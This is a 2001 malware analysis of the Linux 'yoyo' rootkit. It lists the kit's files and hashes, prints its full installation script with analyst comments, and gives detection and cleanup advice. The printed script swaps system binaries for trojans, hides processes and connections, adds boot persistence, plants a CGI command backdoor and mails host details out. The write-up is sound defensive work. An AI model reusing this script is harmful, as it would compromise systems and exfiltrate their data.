Date of Analyse : 28/05/01 Author : Fredrik [ ] Description: Linux rootkit ( yoyo ) -----[ Disclaimer Information revealed in this and other analysis are in no way made to contribute illegal actions such as hacking or other forms of computer crimes. They should serve as informative sources to prevent actions like mentioned before. -----[ Introduction This rootkit was sent to us by an anonymous source. We will try to explain in short terms what a rootkit like this does and how you know if you are infected. The binaries are from the famous linux rootkit (lrk). (My own comments in "[ ]") These are the files that comes with the rootkit package yoyo.tar.gz (yoyo.tar.gz 515790 bytes) : fredrik@slaptop:~/analys/.ppp$ ls -al total 1096 drwxr-xr-x 2 fredrik users 4096 May 26 11:48 ./ drwxr-xr-x 3 fredrik users 4096 May 26 11:48 ../ -rwxr-xr-x 1 fredrik users 4060 Sep 26 1983 citeste* -rwx------ 1 fredrik users 75 Sep 26 1983 clear* -rwx------ 1 fredrik users 2917 May 12 07:05 exec* -rwxr--r-- 1 fredrik users 121 Apr 7 14:15 finger* -rwx------ 1 fredrik users 8268 Sep 26 1983 flood* -rwxr-xr-x 1 fredrik users 48890 Mar 13 19:34 god* -rwxr-xr-x 1 fredrik users 632066 Apr 7 15:16 gpm* -rwxr-xr-x 1 fredrik users 19840 Sep 26 1983 ifconfig* -rw-r--r-- 1 fredrik users 3278 Jan 27 16:11 inetd.conf -rwxr-xr-x 1 fredrik users 35300 Sep 26 1983 netstat* -rwxr--r-- 1 fredrik users 611 Apr 7 13:42 patch* -rwxr-xr-x 1 fredrik users 33280 Sep 26 1983 ps* -rw-r--r-- 1 fredrik users 700 May 5 08:24 s -rw------- 1 fredrik users 540 Oct 22 2000 ssh_host_key -rw------- 1 fredrik users 512 Oct 22 2000 ssh_random_seed -rwx------ 1 fredrik users 7165 Sep 26 1983 tcp* -rw-r--r-- 1 fredrik users 0 Apr 21 11:06 tcp.log -rwxr-xr-x 1 fredrik users 53588 Sep 26 1983 top* -rw-r--r-- 1 fredrik users 195637 Jan 14 21:09 wu-ftpd6x.rpm -rwxr-xr-x 1 fredrik users 72 Apr 7 14:51 xfs* -rwxr-xr-x 1 fredrik users 4620 Feb 26 16:23 yoyo.cgi* MD5SUM output 464dc23cac477c43418eb8d3ef087065 citeste 5f22ceb87631fbcbf32e59234feeaa5b clear 7f08e94c6afda0ece244451775ec5308 exec 51b04922cef6a55df4bb6d30b5ad5af4 finger 4cfae8c44a6d1ede669d41fc320c7325 flood 69cfdfd0632677a37c88ecb6db8a94ac god 8eebeec972e4f59056dbec6531a82eb1 gpm 086394958255553f6f38684dad97869e ifconfig b63485e42035328c0d900a71ff2e6bd7 inetd.conf 2b07576213c1c8b942451459b3dc4903 netstat e75a34c9570df4bea3d81a8d9afe084b patch 7728c15d89f27e376950f96a7510bf0f ps 07287297c42d6b2e917f36d959296033 s c2c1b08498ed71a908c581d634832672 ssh_host_key ad265d3c07dea3151bacb6930e0b72d3 ssh_random_seed 6c0f96c1e43a23a21264f924ae732273 tcp d41d8cd98f00b204e9800998ecf8427e tcp.log 8ff0939cd49a0b2ef3156c7876afca4b top 50c11f333641277ab75e6207bffb13b4 wu-ftpd6x.rpm a798990d214e6700ca6a310b14561142 xfs 202a51b16ac8d1b4dc75de89e7344ed4 yoyo.cgi -----[ Main The following is the installation script called "exec" : #!/bin/sh unset HISTFILE [ Unsetting histfile so no administrator won't see our commands ] clear chown root.root * [ chown'ing all files to root so they always get root with these backdoors ] echo "[[[-]]] Life.. [[[-]]]" echo -n "[[[-]]] Porcariile [[[-]]]" chattr -i /bin/ls [ chattr -i so the files can be changed/removed/etc ] chattr -i /bin/ps chattr -i /bin/netstat chattr -i /bin/top chattr -i /sbin/ifconfig chattr -i /usr/bin/hdparm rm -rf /sbin/ifconfig [ removing the normal binaries and replacing them with the new once ] mv ifconfig /sbin/ifconfig rm -rf /bin/netstat mv netstat /bin/netstat rm -rf /bin/ps mv ps /bin/ps rm -rf /usr/bin/top mv top /usr/bin/top echo "[[[-]]] Done [[[-]]]" echo -n "[[[-]]] Fisierele Din Dev [[[-]]]" touch /dev/dsx >/dev/dsx [ processes hiding file for ps/top. 3 = hide everything containing that string] echo "3 citeste" >>/dev/dsx echo "3 patch" >>/dev/dsx echo "3 tcp" >>/dev/dsx echo "3 flood" >>/dev/dsx echo "3 patch" >>/dev/dsx echo "3 mech" >>/dev/dsx echo "3 luckscan-a" >>/dev/dsx echo "3 luckstatdx" >>/dev/dsx echo "3 bnc" >>/dev/dsx echo "3 psybnc" >>/dev/dsx echo "3 gpm" >>/dev/dsx echo "3 god" >>/dev/dsx echo "3 tcp" >>/dev/dsx touch /dev/caca >/dev/caca echo "1 194.102.107" >>/dev/caca [ netstat hiding file, will hide all connections from 194.102.107 (Intersystems SRL,Romania) echo "1 194.102.107" >>/dev/caca [ and incoming connections to the ports 2407,666,6667, 5 and outgoing to ports 1711,54321 ] echo "1 193" >>/dev/caca echo "3 2407" >>/dev/caca echo "3 666" >>/dev/caca echo "3 6667" >>/dev/caca echo "3 5" >>/dev/caca echo "4 1711" >>/dev/caca echo "4 54321" >>/dev/caca echo echo echo "[[[-]]] Done [[[-]]]" echo "[[[-]]] Directorul home [[[-]]]" mkdir -p /var/lib/games/.src/ [ Making secret rootkit dir ] echo "[[[-]]] Mutam fisierele [[[-]]]" echo mv -f inetd.conf finger god patch tcp wu-ftpd6x.rpm clear citeste mech.set flood gpm s ssh_host_key ssh_random_seed /var/lib/games/. src/ [ copying all files into the rootkit directory ] touch /var/lib/games/.src/tcp.log [ zero'ing out the log file ] # mv -f inetd.conf /etc # killall -HUP inetd echo "[[[-]]] Nice [[[-]]]" echo "# X Font Server ..." >> /etc/rc.d/rc.sysinit [ making the backdoored sshd start at bootup ] echo "/usr/bin/xfs -t1 -X53 -p" >> /etc/rc.d/rc.sysinit echo >> /etc/rc.d/rc.sysinit mv xfs -f /usr/bin/ [ installing startup script for the backdoored sshd ] chmod 500 /usr/bin/xfs chattr +i /usr/bin/xfs /usr/bin/xfs sleep 1 if [ -d /home/httpd/cgi-bin ] [ if a www-server is installed they install a cgi backdoor to allow command executions ] then mv -f yoyo.cgi /home/httpd/cgi-bin/ fi if [ -d /usr/local/httpd/cgi-bin ] then mv -f yoyo.cgi /usr/local/httpd/cgi-bin/ fi if [ -d /usr/local/apache/cgi-bin ] then mv -f yoyo.cgi /usr/local/apache/cgi-bin/ fi if [ -d /www/httpd/cgi-bin ] then mv -f yoyo.cgi /www/httpd/cgi-bin/ fi if [ -d /www/cgi-bin ] then mv -f yoyo.cgi /www/cgi-bin/ fi echo "** Luam Informatiile dorite ..." [ gathering information about the computer and mails it to and ] echo "* Info : $(uname -a)" >> calc echo "* Hostname : $(hostname -f)" >> calc echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> calc echo "* Uptime : $(uptime)" >> calc echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> calc echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> calc echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> calc echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> calc echo "* Spatiu Liber: $(df -h)" >> calc echo "** Gata ! Trimitem Mailul ...Asteapta Te Rog " cat calc | mail -s "65289" cat calc | mail -s "65289" echo "** Am trimis mailul ... stergem fisierele care nu mai trebuie" echo "[[[-]]] G * A * T * A [[[-]]]" cd .. rm -rf calc rk yoyo.tar.gz [ removing traces of the rootkit ] [ end of installation script ] fredrik@slaptop:~/analys/.ppp$ strings xfs [ This script is located in /usr/bin/xfs and it starts the sshd backdoor ] #!/bin/sh cd /var/lib/games/.src ./gpm -f ./s ./tcp >> ./tcp.log & cd / -----[ File summary .ppp/ => exec = installation file citeste = Sorting out the snifferlog made by linsniffer666 clear = Kills the sniffer, removes the log and restart the sniffer. finger = Shellscript that unpacks psybnc and starts it. flood = An old syn flooder (dos tool). god = Remote exploit for wu-ftpd2.6.0(1). (source code : gpm = Backdoored version of sshd. will listen on port 65289 and a magic password to drop a bash shell. ifconfig = Trojan which hides promiscious mode when sniffing. inetd.conf = A replacement for /etc/inetd.conf to enable/disable certain services. netstat = Netstat trojan to hide connections to/from the local machine. Control file = /dev/caca patch = It will kill and remove the portmap startup script, will also patch wu-ftpd. ps/op = Trojan to hide processes. Control file = /dev/dsx. s = Server config for the backdoored sshd. ssh_host_key = host_key for the backdoored sshd binary (made by ssh_random_seed = File needed by the backdoor. tcp.log = Sniffer logfile tcp = A basic linsniffer. wu-ftpd6x.rpm = The patched version of wu-ftpd2.6.0(1). xfs = Shellscript to start the backdoored sshd. yoyo.cgi = Cgi script that will be placed in the cgi-bin/ dir to allow remote execution of commands. -----[ Am I infected ? How do I clean up ? Q: Am I infected ? A: If the files /dev/caca and /dev/dsx exist you are most likely infected. Also check for filechanges and if the rootkit directory /var/lib/games/.src/ exists. Notice that the /bin/ls binary might be trojaned so you might not see that directory. Check /dev/caca and /dev/dsx in first place. Q: How do I clean up ? A: Total reinstallation would be the best choice. Follow the normal procedures after a penetration. -----[ Conclusion This rootkit is developed and compiled for Linux. It seems to be made to backdoor computers that have been compromised by the wu-ftpd2.6.0(1) exploit. The kit patches that hole and kills the portmapper to deny rpc requests and it also contain a wu-ftpd2.6.0 exploit as mentioned before. Two backdoors are placed on the system, one sshd backdoor that runs on a high port and a cgi command executer (if a www-server is installed). The replacement file for inetd.conf only has telnet and pop3 open. The rest is closed. Keep all your software up-to-date and follow mailinglists such as bugtraq. Patch and maintain your server as often as possible and the risk of getting penetrated will be much less. Thank you for reading. Fredrik Östergren.